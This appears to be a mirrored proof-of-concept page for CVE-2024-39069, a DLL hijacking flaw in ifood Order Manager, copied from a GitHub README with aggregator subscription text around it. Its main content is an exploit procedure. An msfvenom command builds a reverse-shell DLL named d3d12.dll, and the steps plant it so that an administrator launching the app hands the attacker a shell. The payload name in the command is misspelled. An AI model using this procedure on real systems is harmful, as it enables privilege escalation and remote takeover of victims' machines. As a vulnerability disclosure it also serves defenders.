CVE-2024-39069 PoC — ifood Order Manager 安全漏洞

Source

https://github.com/AungSoePaing/CVE-2024-39069

Associated Vulnerability

Title:ifood Order Manager 安全漏洞 (CVE-2024-39069)
Description:An issue in ifood Order Manager v3.35.5 'Gestor de Peddios.exe' allows attackers to execute arbitrary code via a DLL hijacking attack.

Description

CVE-2024-39069

Readme

# ifood Order Manager  'Gestor de Peddios.exe' - DLL hijacking

An attacker places a malicious DLL named "d3d12.dll" in a directory that is searched by the application before the legitimate "d3d12.dll" is found. When the application is launched, it loads the malicious DLL instead of the legitimate one, allowing the attacker to execute arbitrary code in the context of the application.

Vendor Homepage: https://gestordepedidos.ifood.com.br/

Google Drive: https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing

POC video: https://youtu.be/oMIobV2M0T8


# POC

1. Create malicious dll file on kali linux with msfvenom

       msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
2.  Transfer created 'd3d12.dll' to the Windows Host from Kali as low level user access
3.  Move the created 'd3d12.dll' file to the 'C:\Gestor de Peddios\d3d12.dll' as low level user access
4.  When Administrator run the application,you will get reverse shell as administrator

File Snapshot


 [4.0K]  /data/pocs/4684690b2bb37f49c2b9c6f1ed49d2c549e415cb
└── [1022]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!